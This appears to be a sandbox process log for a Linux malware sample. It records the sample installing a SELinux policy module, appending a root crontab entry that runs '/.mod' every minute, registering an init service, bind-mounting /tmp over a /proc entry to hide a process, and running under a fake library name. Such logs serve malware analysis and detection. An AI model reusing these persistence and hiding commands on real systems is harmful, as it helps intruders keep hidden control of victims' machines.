                        Start date (UTC):02/07/2024
                        Path:/bin/bash
                        Arguments:/bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable quotaon.service;systemctl start quotaon.service;journalctl -xe --no-pager"
                        File size:1183448 bytes
                        MD5 hash:7063c3930affe123baecd3b340f1ad2c

                        Start time (UTC):16:13:08
                        Start date (UTC):02/07/2024
                        Path:/bin/bash
                        Arguments:-
                        File size:1183448 bytes
                        MD5 hash:7063c3930affe123baecd3b340f1ad2c

                        Start time (UTC):16:13:08
                        Start date (UTC):02/07/2024
                        Path:/usr/bin/systemctl
                        Arguments:systemctl daemon-reload
                        File size:996584 bytes
                        MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                        Start time (UTC):16:13:09
                        Start date (UTC):02/07/2024
                        Path:/bin/bash
                        Arguments:-
                        File size:1183448 bytes
                        MD5 hash:7063c3930affe123baecd3b340f1ad2c

                        Start time (UTC):16:13:09
                        Start date (UTC):02/07/2024
                        Path:/usr/bin/systemctl
                        Arguments:systemctl enable quotaon.service
                        File size:996584 bytes
                        MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                        Start time (UTC):16:13:09
                        Start date (UTC):02/07/2024
                        Path:/bin/bash
                        Arguments:-
                        File size:1183448 bytes
                        MD5 hash:7063c3930affe123baecd3b340f1ad2c

                        Start time (UTC):16:13:09
                        Start date (UTC):02/07/2024
                        Path:/usr/bin/systemctl
                        Arguments:systemctl start quotaon.service
                        File size:996584 bytes
                        MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                        Start time (UTC):16:13:09
                        Start date (UTC):02/07/2024
                        Path:/bin/bash
                        Arguments:-
                        File size:1183448 bytes
                        MD5 hash:7063c3930affe123baecd3b340f1ad2c

                        Start time (UTC):16:13:09
                        Start date (UTC):02/07/2024
                        Path:/usr/bin/journalctl
                        Arguments:journalctl -xe --no-pager
                        File size:80120 bytes
                        MD5 hash:bf3a987344f3bacafc44efd882abda8b

                        Start time (UTC):16:13:09
                        Start date (UTC):02/07/2024
                        Path:/tmp/ausNOyj9by.elf
                        Arguments:-
                        File size:5181592 bytes
                        MD5 hash:ac46e9818cd936fbfcba5effd7f4e850

                        Start time (UTC):16:13:09
                        Start date (UTC):02/07/2024
                        Path:/bin/bash
                        Arguments:/bin/bash -c "cd /boot;ausearch -c 'system.pub' --raw | audit2allow -M my-Systemmod;semodule -X 300 -i my-Systemmod.pp"
                        File size:1183448 bytes
                        MD5 hash:7063c3930affe123baecd3b340f1ad2c

                        Start time (UTC):16:13:09
                        Start date (UTC):02/07/2024
                        Path:/bin/bash
                        Arguments:-
                        File size:1183448 bytes
                        MD5 hash:7063c3930affe123baecd3b340f1ad2c

                        Start time (UTC):16:13:09
                        Start date (UTC):02/07/2024
                        Path:/bin/bash
                        Arguments:-
                        File size:1183448 bytes
                        MD5 hash:7063c3930affe123baecd3b340f1ad2c

                        Start time (UTC):16:13:09
                        Start date (UTC):02/07/2024
                        Path:/bin/bash
                        Arguments:-
                        File size:1183448 bytes
                        MD5 hash:7063c3930affe123baecd3b340f1ad2c

                        Start time (UTC):16:13:09
                        Start date (UTC):02/07/2024
                        Path:/tmp/ausNOyj9by.elf
                        Arguments:-
                        File size:5181592 bytes
                        MD5 hash:ac46e9818cd936fbfcba5effd7f4e850

                        Start time (UTC):16:13:10
                        Start date (UTC):02/07/2024
                        Path:/bin/bash
                        Arguments:/bin/bash -c "echo \"*/1 * * * * root /.mod \" >> /etc/crontab"
                        File size:1183448 bytes
                        MD5 hash:7063c3930affe123baecd3b340f1ad2c

                        Start time (UTC):16:13:10
                        Start date (UTC):02/07/2024
                        Path:/tmp/ausNOyj9by.elf
                        Arguments:-
                        File size:5181592 bytes
                        MD5 hash:ac46e9818cd936fbfcba5effd7f4e850

                        Start time (UTC):16:13:10
                        Start date (UTC):02/07/2024
                        Path:/usr/sbin/update-rc.d
                        Arguments:update-rc.d dns-udp4 defaults
                        File size:3478464 bytes
                        MD5 hash:16a21f464119ea7fad1d3660de963637

                        Start time (UTC):16:13:10
                        Start date (UTC):02/07/2024
                        Path:/usr/sbin/update-rc.d
                        Arguments:-
                        File size:3478464 bytes
                        MD5 hash:16a21f464119ea7fad1d3660de963637

                        Start time (UTC):16:13:10
                        Start date (UTC):02/07/2024
                        Path:/usr/bin/systemctl
                        Arguments:systemctl daemon-reload
                        File size:996584 bytes
                        MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                        Start time (UTC):16:13:11
                        Start date (UTC):02/07/2024
                        Path:/tmp/ausNOyj9by.elf
                        Arguments:-
                        File size:5181592 bytes
                        MD5 hash:ac46e9818cd936fbfcba5effd7f4e850

                        Start time (UTC):16:13:11
                        Start date (UTC):02/07/2024
                        Path:/usr/bin/mount
                        Arguments:mount -o bind /tmp/ /proc/5486
                        File size:55528 bytes
                        MD5 hash:92b20aa8b155ecd3ba9414aa477ef565

                        Start time (UTC):16:13:11
                        Start date (UTC):02/07/2024
                        Path:/tmp/ausNOyj9by.elf
                        Arguments:-
                        File size:5181592 bytes
                        MD5 hash:ac46e9818cd936fbfcba5effd7f4e850

                        Start time (UTC):16:13:11
                        Start date (UTC):02/07/2024
                        Path:/usr/sbin/service
                        Arguments:service cron start
                        File size:129816 bytes
                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                        Start time (UTC):16:13:11
                        Start date (UTC):02/07/2024
                        Path:/usr/sbin/service
                        Arguments:-
                        File size:129816 bytes
                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                        Start time (UTC):16:13:11
                        Start date (UTC):02/07/2024
                        Path:/usr/bin/basename
                        Arguments:basename /usr/sbin/service
                        File size:39256 bytes
                        MD5 hash:3283660e59f128df18bec9b96fbd4d41

                        Start time (UTC):16:13:11
                        Start date (UTC):02/07/2024
                        Path:/usr/sbin/service
                        Arguments:-
                        File size:129816 bytes
                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                        Start time (UTC):16:13:11
                        Start date (UTC):02/07/2024
                        Path:/usr/bin/basename
                        Arguments:basename /usr/sbin/service
                        File size:39256 bytes
                        MD5 hash:3283660e59f128df18bec9b96fbd4d41

                        Start time (UTC):16:13:11
                        Start date (UTC):02/07/2024
                        Path:/usr/sbin/service
                        Arguments:-
                        File size:129816 bytes
                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                        Start time (UTC):16:13:11
                        Start date (UTC):02/07/2024
                        Path:/usr/bin/systemctl
                        Arguments:systemctl --quiet is-active multi-user.target
                        File size:996584 bytes
                        MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                        Start time (UTC):16:13:11
                        Start date (UTC):02/07/2024
                        Path:/usr/sbin/service
                        Arguments:-
                        File size:129816 bytes
                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                        Start time (UTC):16:13:11
                        Start date (UTC):02/07/2024
                        Path:/usr/sbin/service
                        Arguments:-
                        File size:129816 bytes
                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                        Start time (UTC):16:13:11
                        Start date (UTC):02/07/2024
                        Path:/usr/bin/systemctl
                        Arguments:systemctl list-unit-files --full --type=socket
                        File size:996584 bytes
                        MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                        Start time (UTC):16:13:11
                        Start date (UTC):02/07/2024
                        Path:/usr/sbin/service
                        Arguments:-
                        File size:129816 bytes
                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                        Start time (UTC):16:13:11
                        Start date (UTC):02/07/2024
                        Path:/usr/bin/sed
                        Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
                        File size:121288 bytes
                        MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                        Start time (UTC):16:13:13
                        Start date (UTC):02/07/2024
                        Path:/usr/bin/systemctl
                        Arguments:systemctl start cron.service
                        File size:996584 bytes
                        MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                        Start time (UTC):16:13:13
                        Start date (UTC):02/07/2024
                        Path:/tmp/ausNOyj9by.elf
                        Arguments:-
                        File size:5181592 bytes
                        MD5 hash:ac46e9818cd936fbfcba5effd7f4e850

                        Start time (UTC):16:13:13
                        Start date (UTC):02/07/2024
                        Path:/usr/bin/systemctl
                        Arguments:systemctl start crond.service
                        File size:996584 bytes
                        MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                        Start time (UTC):16:13:08
                        Start date (UTC):02/07/2024
                        Path:/usr/lib/systemd/systemd
                        Arguments:-
                        File size:1620224 bytes
                        MD5 hash:9b2bec7092a40488108543f9334aab75

                        Start time (UTC):16:13:08
                        Start date (UTC):02/07/2024
                        Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                        Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                        File size:22760 bytes
                        MD5 hash:3633b075f40283ec938a2a6a89671b0e

                        Start time (UTC):16:13:09
                        Start date (UTC):02/07/2024
                        Path:/usr/lib/systemd/systemd
                        Arguments:-
                        File size:1620224 bytes
                        MD5 hash:9b2bec7092a40488108543f9334aab75

                        Start time (UTC):16:13:09
                        Start date (UTC):02/07/2024
                        Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                        Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                        File size:22760 bytes
                        MD5 hash:3633b075f40283ec938a2a6a89671b0e

                        Start time (UTC):16:13:11
                        Start date (UTC):02/07/2024
                        Path:/usr/lib/systemd/systemd
                        Arguments:-
                        File size:1620224 bytes
                        MD5 hash:9b2bec7092a40488108543f9334aab75

                        Start time (UTC):16:13:11
                        Start date (UTC):02/07/2024
                        Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                        Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                        File size:22760 bytes
                        MD5 hash:3633b075f40283ec938a2a6a89671b0e

                        Start time (UTC):16:13:11
                        Start date (UTC):02/07/2024
                        Path:/usr/lib/udisks2/udisksd
                        Arguments:-
                        File size:483056 bytes
                        MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                        Start time (UTC):16:13:11
                        Start date (UTC):02/07/2024
                        Path:/usr/sbin/dumpe2fs
                        Arguments:dumpe2fs -h /dev/dm-0
                        File size:31112 bytes
                        MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                        Start time (UTC):16:13:13
                        Start date (UTC):02/07/2024
                        Path:/usr/lib/systemd/systemd
                        Arguments:-
                        File size:1620224 bytes
                        MD5 hash:9b2bec7092a40488108543f9334aab75

                        Start time (UTC):16:13:13
                        Start date (UTC):02/07/2024
                        Path:/usr/sbin/cron
                        Arguments:/usr/sbin/cron -f
                        File size:55944 bytes
                        MD5 hash:2c82564ff5cc862c89392b061c7fbd59

                        Start time (UTC):16:14:01
                        Start date (UTC):02/07/2024
                        Path:/usr/sbin/cron
                        Arguments:-
                        File size:55944 bytes
                        MD5 hash:2c82564ff5cc862c89392b061c7fbd59

                        Start time (UTC):16:14:01
                        Start date (UTC):02/07/2024
                        Path:/usr/sbin/cron
                        Arguments:-
                        File size:55944 bytes
                        MD5 hash:2c82564ff5cc862c89392b061c7fbd59

                        Start time (UTC):16:14:01
                        Start date (UTC):02/07/2024
                        Path:/bin/sh
                        Arguments:/bin/sh -c "/.mod "
                        File size:129816 bytes
                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                        Start time (UTC):16:14:01
                        Start date (UTC):02/07/2024
                        Path:/bin/sh
                        Arguments:-
                        File size:129816 bytes
                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                        Start time (UTC):16:14:01
                        Start date (UTC):02/07/2024
                        Path:/.mod
                        Arguments:/.mod
                        File size:1183448 bytes
                        MD5 hash:7063c3930affe123baecd3b340f1ad2c

                        Start time (UTC):16:14:01
                        Start date (UTC):02/07/2024
                        Path:/.mod
                        Arguments:-
                        File size:1183448 bytes
                        MD5 hash:7063c3930affe123baecd3b340f1ad2c

                        Start time (UTC):16:14:01
                        Start date (UTC):02/07/2024
                        Path:/usr/lib/libgdi.so.0.8.2
                        Arguments:/usr/lib/libgdi.so.0.8.2
                        File size:5181592 bytes
                        MD5 hash:ac46e9818cd936fbfcba5effd7f4e850

                        Start time (UTC):16:14:01
                        Start date (UTC):02/07/2024
                        Path:/usr/lib/libgdi.so.0.8.2
                        Arguments:-
                        File size:5181592 bytes
                        MD5 hash:ac46e9818cd936fbfcba5effd7f4e850

                        Start time (UTC):16:14:01
                        Start date (UTC):02/07/2024
                        Path:/usr/lib/libgdi.so.0.8.2
                        Arguments:/usr/lib/libgdi.so.0.8.2
                        File size:5181592 bytes
                        MD5 hash:ac46e9818cd936fbfcba5effd7f4e850

                        Start time (UTC):16:14:02
                        Start date (UTC):02/07/2024
                        Path:/usr/lib/systemd/systemd
                        Arguments:-
                        File size:1620224 bytes
                        MD5 hash:9b2bec7092a40488108543f9334aab75

                        Start time (UTC):16:14:02
                        Start date (UTC):02/07/2024
                        Path:/usr/sbin/cron
                        Arguments:/usr/sbin/cron -f
                        File size:55944 bytes
                        MD5 hash:2c82564ff5cc862c89392b061c7fbd59

                        Start time (UTC):16:15:01
                        Start date (UTC):02/07/2024
                        Path:/usr/sbin/cron
                        Arguments:-
                        File size:55944 bytes
                        MD5 hash:2c82564ff5cc862c89392b061c7fbd59

                        Start time (UTC):16:15:01
                        Start date (UTC):02/07/2024
                        Path:/usr/sbin/cron
                        Arguments:-
                        File size:55944 bytes
                        MD5 hash:2c82564ff5cc862c89392b061c7fbd59

                        Start time (UTC):16:15:01
                        Start date (UTC):02/07/2024
                        Path:/bin/sh
                        Arguments:/bin/sh -c "/.mod "
                        File size:129816 bytes
                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                        Start time (UTC):16:15:01
                        Start date (UTC):02/07/2024
                        Path:/bin/sh
                        Arguments:-
                        File size:129816 bytes
                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                        Start time (UTC):16:15:01
                        Start date (UTC):02/07/2024
                        Path:/.mod
                        Arguments:/.mod
                        File size:1183448 bytes
                        MD5 hash:7063c3930affe123baecd3b340f1ad2c

                        Start time (UTC):16:15:01
                        Start date (UTC):02/07/2024
                        Path:/.mod
                        Arguments:-
                        File size:1183448 bytes
                        MD5 hash:7063c3930affe123baecd3b340f1ad2c

                        Start time (UTC):16:15:01
                        Start date (UTC):02/07/2024
                        Path:/usr/lib/libgdi.so.0.8.2
                        Arguments:/usr/lib/libgdi.so.0.8.2
                        File size:5181592 bytes
                        MD5 hash:ac46e9818cd936fbfcba5effd7f4e850

                        Start time (UTC):16:15:01
                        Start date (UTC):02/07/2024
                        Path:/usr/lib/libgdi.so.0.8.2
                        Arguments:-
                        File size:5181592 bytes
                        MD5 hash:ac46e9818cd936fbfcba5effd7f4e850

                        Start time (UTC):16:15:01
                        Start date (UTC):02/07/2024
                        Path:/usr/lib/libgdi.so.0.8.2
                        Arguments:/usr/lib/libgdi.so.0.8.2
                        File size:5181592 bytes
                        MD5 hash:ac46e9818cd936fbfcba5effd7f4e850

                        Start time (UTC):16:15:01
                        Start date (UTC):02/07/2024
                        Path:/usr/lib/systemd/systemd
                        Arguments:-
                        File size:1620224 bytes
                        MD5 hash:9b2bec7092a40488108543f9334aab75

                        Start time (UTC):16:15:01
                        Start date (UTC):02/07/2024
                        Path:/usr/sbin/cron
                        Arguments:/usr/sbin/cron -f
                        File size:55944 bytes
                        MD5 hash:2c82564ff5cc862c89392b061c7fbd59